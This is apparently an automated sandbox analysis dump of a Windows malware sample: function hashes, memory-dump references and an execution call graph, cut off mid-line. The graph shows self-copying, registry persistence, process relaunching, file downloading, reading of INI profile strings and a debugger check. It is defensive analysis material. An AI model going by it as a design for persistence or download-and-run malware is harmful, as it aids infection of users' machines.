                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3604167287-0
                                                                                                                                                                                                                • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                                • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                                                                                                                                                                                                                • CharLowerW.USER32(00408795), ref: 004095D8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00408795), ref: 00409608
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CharFreeLowerString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2335467167-0
                                                                                                                                                                                                                • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                                • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                • String ID: -
                                                                                                                                                                                                                • API String ID: 885266447-2547889144
                                                                                                                                                                                                                • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                                • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:6.6%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                Total number of Nodes:1147
                                                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                                                execution_graph 6114 404ec0 6138 40821c 6114->6138 6116 404edf 6117 404f04 6116->6117 6118 404ef4 6116->6118 6121 404efd 6116->6121 6145 40c519 6117->6145 6141 404e7b 6118->6141 6122 405111 6123 40c5b9 SysFreeString 6122->6123 6123->6121 6124 4050f2 6164 40c5b9 6124->6164 6127 40c5b9 SysFreeString 6128 405103 6127->6128 6129 40c5b9 SysFreeString 6128->6129 6130 405109 6129->6130 6131 40c5b9 SysFreeString 6130->6131 6131->6122 6132 404f0b 6132->6121 6132->6122 6132->6124 6152 40c43d 6132->6152 6137 4050e2 6161 40be3a 6137->6161 6139 408220 6138->6139 6140 408233 PathCombineW 6138->6140 6139->6140 6140->6116 6142 404e93 6141->6142 6167 408248 6142->6167 6181 40c4b4 CoCreateInstance 6145->6181 6148 40c589 6148->6132 6149 40c531 VariantInit SysAllocString 6149->6148 6151 40c551 VariantClear 6149->6151 6151->6148 6183 40bf60 6152->6183 6155 4050ce 6155->6137 6157 40c00b 6155->6157 6156 40be3a HeapFree 6156->6155 6158 40c01a 6157->6158 6160 40c03b 6157->6160 6159 40bde1 3 API calls 6158->6159 6159->6160 6160->6137 6162 40be41 HeapFree 6161->6162 6163 40be53 6161->6163 6162->6163 6163->6124 6165 40c5c0 SysFreeString 6164->6165 6166 4050fb 6164->6166 6165->6166 6166->6127 6168 40821c PathCombineW 6167->6168 6169 408268 6168->6169 6170 408272 FindFirstFileW 6169->6170 6171 404eb9 6169->6171 6170->6171 6178 408292 6170->6178 6171->6121 6172 4082a2 WaitForSingleObject 6173 4083b6 FindClose 6172->6173 6172->6178 6173->6171 6174 40839e FindNextFileW 6174->6173 6174->6178 6175 408306 PathMatchSpecW 6175->6178 6176 40821c PathCombineW 6176->6178 6177 408374 Sleep 6177->6178 6178->6172 6178->6173 6178->6174 6178->6175 6178->6176 6178->6177 6179 40833f Sleep 6178->6179 6180 408248 PathCombineW 6178->6180 6179->6178 6180->6178 6182 40c4dd 6181->6182 6182->6148 6182->6149 6184 40bf72 6183->6184 6185 40bfbf 6184->6185 6187 40bfa7 wvnsprintfW 6184->6187 6188 40bde1 6184->6188 6185->6155 6185->6156 6187->6184 6189 40bdf2 6188->6189 6190 40bde5 6188->6190 6192 40be0c HeapReAlloc 6189->6192 6193 40bdfc HeapAlloc 6189->6193 6191 40be3a HeapFree 6190->6191 6194 40bdec 6191->6194 6192->6194 6193->6194 6194->6184 6825 409402 6826 409415 6825->6826 6827 409419 6826->6827 6828 409437 SysFreeString 6826->6828 6828->6827 6829 409883 6830 409890 6829->6830 6831 409655 __VEC_memcpy 6830->6831 6832 4098ad 6831->6832 6833 409655 __VEC_memcpy 6832->6833 6834 4098c7 6832->6834 6833->6834 6195 409445 6197 40945a 6195->6197 6196 40945e 6197->6196 6198 4094a0 SysFreeString SysFreeString 6197->6198 6198->6196 5706 40b346 5752 40d5b0 5706->5752 5709 40b37e 5736 40b3db 5709->5736 5798 40ac20 RegOpenKeyExW 5709->5798 5713 40b394 GetModuleFileNameW 5806 4069fd RegCreateKeyExW 5713->5806 5718 40b3c5 5810 40a786 5718->5810 5719 40b3ca GetLastError 5719->5718 5720 40b3f2 Sleep 5722 40a786 35 API calls 5720->5722 5723 40b407 GetModuleFileNameW 5722->5723 5725 40ac20 4 API calls 5723->5725 5737 40b3d8 5725->5737 5726 40b45c 5728 40ac20 4 API calls 5726->5728 5730 40b468 5728->5730 5729 40b426 CopyFileW 5731 40b43f 5729->5731 5729->5736 5734 407727 54 API calls 5730->5734 5735 4077f0 CreateProcessW 5731->5735 5732 40b4b9 ExpandEnvironmentStringsW 5732->5736 5733 40b4cf GetModuleFileNameW 5733->5737 5738 40b474 5734->5738 5741 40b44b 5735->5741 5736->5720 5736->5726 5736->5732 5736->5733 5745 40b44c ExitProcess 5736->5745 5746 40b4fe GetLastError 5736->5746 5754 40b2ce OleInitialize 5736->5754 5763 40aafd 5736->5763 5772 40ab7c GetModuleFileNameW CharLowerW 5736->5772 5777 40abd9 5736->5777 5783 407727 5736->5783 5795 4077f0 5736->5795 5737->5729 5737->5736 5739 40b498 GetLastError 5738->5739 5740 40b47a 5738->5740 5744 40b4a3 5739->5744 5743 4077f0 CreateProcessW 5740->5743 5741->5745 5747 40b486 5743->5747 5748 40a786 35 API calls 5744->5748 5749 40a786 35 API calls 5746->5749 5747->5745 5750 40b48b GetLastError 5747->5750 5751 40b4a8 5748->5751 5749->5736 5750->5744 5751->5745 5753 40b353 GetModuleFileNameW 5752->5753 5753->5709 5756 40b2e2 5754->5756 5758 40b325 InternetCloseHandle 5756->5758 5826 407552 5756->5826 5829 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5756->5829 5834 40ac93 5756->5834 5851 40b096 5756->5851 5887 40a6c9 5758->5887 5764 40d5b0 5763->5764 5765 40ab0a GetCommandLineW 5764->5765 5766 40ab1a 5765->5766 5767 40ab1f 5766->5767 5768 40ac20 4 API calls 5766->5768 5767->5736 5769 40ab30 5768->5769 5769->5767 5770 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5769->5770 5771 40ab73 5770->5771 5771->5767 5773 40abb6 5772->5773 5774 40abc0 GetCommandLineW 5773->5774 5775 40abbb 5773->5775 5776 40abd0 5774->5776 5775->5736 5776->5736 5778 40ac20 4 API calls 5777->5778 5779 40abf2 5778->5779 5780 40abf7 FindFirstFileW 5779->5780 5781 40ac1a 5779->5781 5780->5781 5782 40ac0e FindClose 5780->5782 5781->5736 5782->5781 5784 40d5b0 5783->5784 5785 407731 GetModuleFileNameW 5784->5785 5786 407753 5785->5786 5792 40776d 5785->5792 5787 4075d4 15 API calls 5786->5787 5790 407764 5787->5790 5788 407774 ExpandEnvironmentStringsW 6100 4075d4 CreateFileW 5788->6100 5790->5736 5791 4077a7 GetLastError 5791->5792 5792->5788 5792->5790 5792->5791 5793 4077bc GetLastError 5792->5793 5794 40a786 35 API calls 5792->5794 5793->5792 5794->5792 6110 40d530 5795->6110 5797 407805 CreateProcessW 5797->5736 5799 40ac60 RegOpenKeyExW 5798->5799 5800 40ac4a 5798->5800 5802 40ac78 5799->5802 5803 40ac7c 5799->5803 6112 4069c0 RegQueryValueExW RegCloseKey 5800->6112 5802->5713 5802->5736 6113 4069c0 RegQueryValueExW RegCloseKey 5803->6113 5805 40ac5a 5805->5799 5805->5802 5807 406a30 5806->5807 5808 406a2c 5806->5808 5809 406a39 RegSetValueExW RegCloseKey 5807->5809 5808->5718 5808->5719 5809->5808 5812 40a79c 5810->5812 5814 40a7b3 5810->5814 5811 406d14 2 API calls 5811->5812 5812->5811 5813 40a79e Sleep 5812->5813 5812->5814 5813->5812 5815 406cb5 GetVersionExW 5814->5815 5816 40a83f 5815->5816 5817 4078cb 12 API calls 5816->5817 5818 40a873 5817->5818 5819 40a718 5 API calls 5818->5819 5823 40a87b 5819->5823 5820 40a744 5 API calls 5820->5823 5821 40a894 Sleep 5821->5823 5822 406e69 22 API calls 5822->5823 5823->5820 5823->5821 5823->5822 5824 40a8c7 Sleep 5823->5824 5825 40a8e1 GetProcessHeap HeapFree 5823->5825 5824->5823 5825->5737 5891 40584d 5826->5891 5828 407557 Sleep 5828->5756 5830 4073dd SystemTimeToFileTime SystemTimeToFileTime 5829->5830 5832 407432 5830->5832 5833 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5832->5833 5833->5756 5892 406d14 InternetAttemptConnect 5834->5892 5836 40aca4 5837 40aca9 Sleep 5836->5837 5838 40acbd 5836->5838 5839 406d14 2 API calls 5837->5839 5895 4078cb 5838->5895 5839->5836 5841 40acd4 5904 406cb5 GetVersionExW 5841->5904 5843 40ad09 5906 40a718 5843->5906 5847 40ad71 Sleep 5850 40ad4c 5847->5850 5848 40ad9f Sleep 5848->5850 5849 40adbc 5849->5756 5850->5847 5850->5848 5850->5849 5910 40a744 5850->5910 5914 406e69 5850->5914 5852 40b0a3 5851->5852 5853 40b0bd 5852->5853 5854 40b0cf 5852->5854 5881 40b0ae 5852->5881 6020 407995 5853->6020 6027 407951 5854->6027 5857 40b177 InternetClearAllPerSiteCookieDecisions 5860 40b17d 5857->5860 5858 40b168 InternetSetPerSiteCookieDecisionW 5858->5860 5859 40b0cd 5861 40b0fb GetModuleFileNameW 5859->5861 5873 40b155 5859->5873 6048 4032b8 5860->6048 5863 40b116 GetCurrentDirectoryW 5861->5863 5870 40b10d 5861->5870 5863->5870 5865 40b186 GetLastError 5867 40a786 35 API calls 5865->5867 5866 40b196 5868 40b1b0 CreateThread 5866->5868 5869 40b1e1 5866->5869 5867->5866 5868->5866 5872 40b221 5869->5872 5874 40a786 35 API calls 5869->5874 6032 40253c 5870->6032 5875 40b228 CloseHandle 5872->5875 5876 40b23d 5872->5876 5873->5857 5873->5858 5873->5881 5877 40b1f7 5874->5877 5875->5875 5875->5876 5878 40a6c9 InternetCloseHandle 5876->5878 5877->5872 5880 40b212 WaitForMultipleObjects 5877->5880 5879 40b242 InternetClearAllPerSiteCookieDecisions 5878->5879 5879->5881 5882 40b24d 5879->5882 5880->5872 5881->5756 5882->5881 5883 40b261 GetModuleFileNameW 5882->5883 5884 40b27c GetCurrentDirectoryW 5883->5884 5885 40b273 5883->5885 5884->5885 5886 40253c 50 API calls 5885->5886 5886->5881 5890 40a6cf 5887->5890 5888 40a6fc InternetCloseHandle 5888->5890 5889 40a716 ExitProcess 5890->5888 5890->5889 5891->5828 5893 406d22 5892->5893 5894 406d26 InternetOpenW 5892->5894 5893->5836 5894->5836 5926 407e2b 5895->5926 5897 407903 5897->5841 5900 4078ec 5900->5897 5901 4078f4 5900->5901 5938 407d61 5901->5938 5903 407900 5903->5897 5905 406cf6 5904->5905 5905->5843 5907 40a722 5906->5907 5908 40a739 5907->5908 5950 4079ff 5907->5950 5908->5850 5911 40a75d 5910->5911 5912 4079ff 5 API calls 5911->5912 5913 40a76e 5911->5913 5912->5913 5913->5850 5915 40d5b0 5914->5915 5916 406e76 GetTickCount 5915->5916 5917 406e92 5916->5917 5956 407b4e 5917->5956 5919 406f49 5965 409c99 5919->5965 5923 407017 5923->5850 5924 406ff4 5924->5923 5981 407a3c 5924->5981 5927 407e3d 5926->5927 5928 407e4e SetFilePointer ReadFile 5926->5928 5944 407cd7 5927->5944 5930 4078dd 5928->5930 5932 407e7e 5928->5932 5930->5897 5933 40782a GetModuleFileNameW CreateFileW 5930->5933 5931 407e44 5931->5928 5931->5930 5932->5930 5934 407871 GetFileTime CloseHandle 5933->5934 5935 407888 GetTickCount 5933->5935 5936 4078b0 5934->5936 5937 407893 5935->5937 5936->5900 5937->5936 5939 407d70 5938->5939 5940 407d77 5938->5940 5941 407cd7 3 API calls 5939->5941 5942 407d81 5940->5942 5943 407dfa SetFilePointer WriteFile 5940->5943 5941->5940 5942->5903 5943->5903 5945 40d5b0 5944->5945 5946 407ce4 GetModuleFileNameW 5945->5946 5947 407d0d GetCurrentDirectoryW 5946->5947 5948 407d00 5946->5948 5947->5948 5949 407d36 CreateFileW 5948->5949 5949->5931 5953 407908 5950->5953 5952 407a05 5952->5907 5954 407e2b 5 API calls 5953->5954 5955 407919 5954->5955 5955->5952 5991 407267 5956->5991 5958 407b63 5959 407e2b 5 API calls 5958->5959 5960 407b83 5958->5960 5959->5960 5961 407c6b 5960->5961 5996 40bcb4 5960->5996 6006 40bd55 5961->6006 5967 409ca6 5965->5967 5966 409cbb InternetOpenUrlW 5968 409cdf GetProcessHeap HeapAlloc 5966->5968 5969 406fe2 5966->5969 5967->5966 5968->5969 5970 409d5b InternetReadFile 5968->5970 5969->5923 5977 406e00 5969->5977 5971 409d79 GetProcessHeap HeapAlloc 5970->5971 5972 409d0b 5970->5972 5975 409d92 GetProcessHeap HeapFree 5971->5975 5972->5970 5972->5971 5973 409d1f GetProcessHeap HeapReAlloc 5972->5973 5976 40c5d0 __VEC_memcpy 5972->5976 5973->5969 5973->5972 5975->5969 5976->5972 5978 406e12 5977->5978 5979 40c5d0 __VEC_memcpy 5978->5979 5980 406e21 5979->5980 5980->5924 5982 407a4f 5981->5982 5983 40c5d0 __VEC_memcpy 5982->5983 5990 407b42 5982->5990 5984 407a7d 5983->5984 5985 407267 3 API calls 5984->5985 5984->5990 5986 407b17 5985->5986 5987 407267 3 API calls 5986->5987 5988 407b20 5987->5988 5989 407d61 5 API calls 5988->5989 5989->5990 5990->5923 5992 407284 5991->5992 5993 407278 GetSystemTime 5991->5993 5994 40728b SystemTimeToFileTime SystemTimeToFileTime 5992->5994 5993->5994 5995 4072e8 __aulldiv 5994->5995 5995->5958 5997 40bcd3 5996->5997 5998 40bd17 5997->5998 6012 40c5d0 5997->6012 5999 40bd3a 5998->5999 6001 40b51c __VEC_memcpy 5998->6001 6000 40bd4d 5999->6000 6002 40c5d0 __VEC_memcpy 5999->6002 6000->5961 6001->5998 6002->6000 6007 40bd5c 6006->6007 6007->6007 6008 40bd9e 6007->6008 6010 40bcb4 __VEC_memcpy 6007->6010 6009 40bcb4 __VEC_memcpy 6008->6009 6011 407c7c 6009->6011 6010->6008 6011->5919 6013 40c5e8 6012->6013 6014 40bcf9 6013->6014 6015 40c60f __VEC_memcpy 6013->6015 6014->6000 6016 40b51c 6014->6016 6015->6014 6017 40b543 6016->6017 6018 40b552 6016->6018 6019 40c5d0 __VEC_memcpy 6017->6019 6018->5998 6019->6018 6026 4079a2 6020->6026 6021 4079f1 6022 407951 36 API calls 6021->6022 6023 4079fc 6022->6023 6023->5859 6024 407e2b 5 API calls 6024->6026 6026->6021 6026->6024 6055 40791c 6026->6055 6029 407965 6027->6029 6028 407e2b 5 API calls 6028->6029 6029->6028 6030 40798e 6029->6030 6031 40791c 36 API calls 6029->6031 6030->5859 6031->6029 6033 402549 6032->6033 6035 402572 6033->6035 6036 406d14 2 API calls 6033->6036 6041 402561 Sleep 6033->6041 6034 402584 DeleteFileW 6038 402594 6034->6038 6044 4025ba 6034->6044 6035->6034 6037 40a786 35 API calls 6035->6037 6036->6033 6039 402581 6037->6039 6042 4025c1 6038->6042 6043 4025ad Sleep 6038->6043 6061 407036 DeleteFileW CreateFileW 6038->6061 6039->6034 6041->6033 6045 40a786 35 API calls 6042->6045 6047 4025d0 _memset 6042->6047 6043->6038 6043->6044 6044->5873 6045->6047 6046 402630 CreateProcessW 6046->6044 6047->6046 6072 406a68 RegOpenKeyExW 6048->6072 6053 403351 GetProcAddress GetProcAddress GetProcAddress 6054 403386 6053->6054 6054->5865 6054->5866 6056 407d61 5 API calls 6055->6056 6057 407930 6056->6057 6058 407939 GetLastError 6057->6058 6059 407949 6057->6059 6060 40a786 35 API calls 6058->6060 6059->6026 6060->6059 6062 407078 GetLastError 6061->6062 6067 40706b 6061->6067 6063 407095 InternetOpenUrlW 6062->6063 6064 407089 SetEndOfFile 6062->6064 6065 4070c6 InternetQueryDataAvailable 6063->6065 6066 4070b8 CloseHandle 6063->6066 6064->6063 6068 407119 InternetReadFile 6065->6068 6066->6067 6067->6038 6069 407123 CloseHandle InternetCloseHandle 6068->6069 6070 4070ed 6068->6070 6069->6067 6070->6069 6071 4070f2 WriteFile 6070->6071 6071->6068 6073 406a9a 6072->6073 6077 4032c4 6072->6077 6096 4069c0 RegQueryValueExW RegCloseKey 6073->6096 6075 406aaa 6076 4069fd 3 API calls 6075->6076 6075->6077 6076->6077 6078 406adf 6077->6078 6079 406aec 6078->6079 6080 406b11 RegOpenKeyExW 6079->6080 6081 406b34 6080->6081 6089 4032ce 6 API calls 6080->6089 6097 4069c0 RegQueryValueExW RegCloseKey 6081->6097 6083 406b49 6084 406b78 RegOpenKeyExW 6083->6084 6083->6089 6085 406b96 6084->6085 6086 406ba6 6084->6086 6098 4069c0 RegQueryValueExW RegCloseKey 6085->6098 6088 4069fd 3 API calls 6086->6088 6090 406bc3 6086->6090 6088->6090 6089->6053 6089->6054 6090->6089 6091 406c03 RegOpenKeyExW 6090->6091 6092 406c21 6091->6092 6095 406c31 6091->6095 6099 4069c0 RegQueryValueExW RegCloseKey 6092->6099 6094 4069fd 3 API calls 6094->6089 6095->6089 6095->6094 6096->6075 6097->6083 6098->6086 6099->6095 6101 40760a CreateFileW 6100->6101 6102 407622 6100->6102 6101->6102 6103 40762a GetFileSize GetProcessHeap HeapAlloc 6101->6103 6102->5792 6103->6102 6104 407650 ReadFile 6103->6104 6104->6102 6105 40766a 6104->6105 6105->6102 6106 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6105->6106 6109 40584d 6106->6109 6108 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6108->6102 6109->6108 6111 40d53c __VEC_memzero 6110->6111 6111->5797 6112->5805 6113->5802 6835 401006 6836 40101f 6835->6836 6837 407499 5 API calls 6836->6837 6840 4010c1 6836->6840 6838 4010ce 6837->6838 6839 407552 Sleep 6838->6839 6838->6840 6839->6840 6841 409a07 6844 409a14 6841->6844 6842 409a92 6843 409a6d SysAllocString 6843->6842 6844->6842 6844->6843 6845 403287 6846 4032aa 6845->6846 6847 403292 6845->6847 6847->6846 6849 408604 RegOpenKeyExW 6847->6849 6850 408632 6849->6850 6851 40864a GetLastError 6849->6851 6859 4069c0 RegQueryValueExW RegCloseKey 6850->6859 6853 408654 6851->6853 6854 408658 6851->6854 6853->6847 6856 408682 DeleteFileW 6854->6856 6857 40866a 6854->6857 6855 408646 6855->6851 6856->6853 6858 4069fd 3 API calls 6857->6858 6858->6853 6859->6855 6869 40ce08 6870 40ce1a 6869->6870 6872 40ce28 @_EH4_CallFilterFunc@8 6869->6872 6871 40cd66 __except_handler4 5 API calls 6870->6871 6871->6872 6873 409909 6874 409916 6873->6874 6881 409723 6874->6881 6876 409a02 6877 409934 6877->6876 6878 409723 __VEC_memcpy 6877->6878 6879 4099d5 6878->6879 6879->6876 6880 4099de SysAllocString SysAllocString 6879->6880 6880->6876 6882 409733 6881->6882 6883 40c5d0 __VEC_memcpy 6882->6883 6884 409772 6882->6884 6883->6884 6884->6877 6199 4047cc 6200 40821c PathCombineW 6199->6200 6201 4047f1 6200->6201 6202 40483b 6201->6202 6203 404800 6201->6203 6204 404843 6201->6204 6207 408248 8 API calls 6203->6207 6223 4083c4 CreateFileW 6204->6223 6207->6202 6210 404a61 6212 404a79 6210->6212 6213 404a69 VirtualFree 6210->6213 6211 40487b HeapAlloc 6220 404896 6211->6220 6212->6202 6214 404a7f CloseHandle 6212->6214 6213->6212 6214->6202 6215 404a4a 6216 40be3a HeapFree 6215->6216 6217 404a53 6216->6217 6244 40be54 6217->6244 6219 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6219->6220 6220->6215 6220->6219 6222 40c00b 3 API calls 6220->6222 6239 40c3f9 6220->6239 6222->6220 6224 4083ea GetFileSizeEx 6223->6224 6227 404854 6223->6227 6225 4083f9 6224->6225 6226 40844f CloseHandle 6224->6226 6225->6226 6225->6227 6228 40840e VirtualAlloc 6225->6228 6226->6227 6227->6202 6232 40c290 6227->6232 6228->6226 6229 408423 ReadFile 6228->6229 6230 408441 VirtualFree 6229->6230 6231 408439 6229->6231 6230->6226 6231->6227 6231->6230 6233 40486e 6232->6233 6238 40c2b6 6232->6238 6233->6210 6233->6211 6234 40bde1 3 API calls 6234->6238 6235 40c340 6236 40be54 HeapFree 6235->6236 6236->6233 6238->6233 6238->6234 6238->6235 6250 40c05c 6238->6250 6240 40c402 6239->6240 6241 40c407 6239->6241 6240->6220 6242 40c412 wvnsprintfW 6241->6242 6243 40c42e 6242->6243 6243->6220 6246 40be5b 6244->6246 6249 40be73 6244->6249 6245 40be3a HeapFree 6245->6246 6246->6245 6247 40be6d 6246->6247 6246->6249 6248 40be3a HeapFree 6247->6248 6248->6249 6249->6210 6251 40c066 6250->6251 6252 40c06a 6250->6252 6251->6238 6252->6251 6255 40be27 HeapAlloc 6252->6255 6254 40c086 6254->6238 6255->6254 6885 40978d 6886 40979a 6885->6886 6887 409655 __VEC_memcpy 6886->6887 6888 4097b3 6887->6888 6889 4097ba 6888->6889 6890 409655 __VEC_memcpy 6888->6890 6891 4097d6 6890->6891 6892 409805 6891->6892 6893 4097df SysAllocString SysAllocString 6891->6893 6893->6892 6894 402d0e 6895 40267a 122 API calls 6894->6895 6896 402d32 6895->6896 6899 409c6f 6896->6899 6900 402d3a 6899->6900 6901 409c7a SysFreeString 6899->6901 6901->6900 6901->6901 6902 40350f 6903 40821c PathCombineW 6902->6903 6904 403531 6903->6904 6905 40354d 6904->6905 6906 403540 6904->6906 6907 403553 HeapAlloc 6904->6907 6908 4034a8 8 API calls 6906->6908 6907->6905 6909 403576 GetPrivateProfileStringW 6907->6909 6908->6905 6910 403594 6909->6910 6911 40372c 6909->6911 6910->6911 6913 4035a8 HeapAlloc 6910->6913 6912 40be3a HeapFree 6911->6912 6912->6905 6913->6911 6920 4035c5 6913->6920 6914 403627 GetPrivateProfileStringW 6915 403643 GetPrivateProfileIntW 6914->6915 6914->6920 6916 403669 GetPrivateProfileStringW 6915->6916 6915->6920 6917 40368b GetPrivateProfileStringW 6916->6917 6916->6920 6917->6920 6918 403723 6919 40be3a HeapFree 6918->6919 6919->6911 6920->6914 6920->6918 6921 40c3f9 wvnsprintfW 6920->6921 6922 40c00b 3 API calls 6920->6922 6921->6920 6922->6920 6256 40cbd0 6257 40cc08 6256->6257 6258 40cbfb 6256->6258 6260 40cd66 __except_handler4 5 API calls 6257->6260 6274 40cd66 6258->6274 6263 40cc18 __except_handler4 6260->6263 6261 40cc9f 6262 40cc74 __except_handler4 6262->6261 6264 40cc8f 6262->6264 6266 40cd66 __except_handler4 5 API calls 6262->6266 6263->6261 6263->6262 6268 40ccb5 _CallDestructExceptionObject 6263->6268 6265 40cd66 __except_handler4 5 API calls 6264->6265 6265->6261 6266->6264 6282 40ce9a RtlUnwind 6268->6282 6269 40ccf4 __except_handler4 6270 40cd2b 6269->6270 6271 40cd66 __except_handler4 5 API calls 6269->6271 6272 40cd66 __except_handler4 5 API calls 6270->6272 6271->6270 6273 40cd3b __except_handler4 6272->6273 6275 40cd70 IsDebuggerPresent 6274->6275 6276 40cd6e 6274->6276 6284 40d247 6275->6284 6276->6257 6279 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6280 40d0f3 __except_handler4 6279->6280 6281 40d0fb GetCurrentProcess TerminateProcess 6279->6281 6280->6281 6281->6257 6283 40ceaf 6282->6283 6283->6269 6284->6279 6929 40d990 6930 40d993 VirtualQuery 6929->6930 6932 40d9b2 6930->6932 6934 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6930->6934 6933 40d9cc GetVersionExA 6932->6933 6932->6934 6933->6934 6285 401652 6286 401665 6285->6286 6290 4016f6 6286->6290 6291 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6286->6291 6288 4016da 6289 407552 Sleep 6288->6289 6288->6290 6289->6290 6292 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6291->6292 6292->6288 6935 402214 6938 402233 6935->6938 6936 402319 6937 402386 6936->6937 6943 401c41 6936->6943 6938->6936 6940 408091 3 API calls 6938->6940 6940->6936 6941 402478 6941->6937 6942 408091 3 API calls 6941->6942 6942->6937 6948 401c4e 6943->6948 6944 401e07 6947 407267 3 API calls 6944->6947 6949 401d15 6944->6949 6945 401d0e 6946 407267 3 API calls 6945->6946 6946->6949 6947->6949 6948->6944 6948->6945 6949->6941 6293 402dd5 6296 40267a 6293->6296 6302 40268a 6296->6302 6297 4027dd 6298 4026ee GetTickCount 6298->6302 6301 407552 Sleep 6301->6302 6302->6297 6302->6298 6302->6301 6303 4027e6 OleInitialize 6302->6303 6364 40a8f9 6302->6364 6381 40a469 6303->6381 6305 402806 6313 40280b 6305->6313 6388 40a345 6305->6388 6308 402851 6394 40a65e 6308->6394 6309 40285f 6311 40286e 6309->6311 6397 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6309->6397 6399 409f2b 6311->6399 6313->6302 6315 402884 6316 4028b4 6315->6316 6320 402943 6315->6320 6407 408f26 6315->6407 6316->6320 6321 408f26 10 API calls 6316->6321 6318 402c20 6319 40a65e Sleep 6318->6319 6319->6313 6320->6318 6328 4029aa 6320->6328 6432 4089fd 6320->6432 6322 4028ea 6321->6322 6324 4028f1 6322->6324 6325 402956 6322->6325 6323 4029e6 6326 402a3b 6323->6326 6441 40920a 6323->6441 6331 402904 SysAllocString 6324->6331 6329 40a65e Sleep 6325->6329 6332 402a6f 6326->6332 6337 408f26 10 API calls 6326->6337 6328->6323 6333 4089fd 5 API calls 6328->6333 6329->6320 6335 402927 SysFreeString 6331->6335 6336 40293a 6331->6336 6338 402aa2 6332->6338 6341 408f26 10 API calls 6332->6341 6333->6323 6334 402a17 6446 409c49 6334->6446 6335->6335 6335->6336 6336->6320 6426 4091bd 6336->6426 6340 402a62 SysAllocString 6337->6340 6342 408f26 10 API calls 6338->6342 6344 402ad1 6338->6344 6340->6332 6347 402a95 SysAllocString 6341->6347 6348 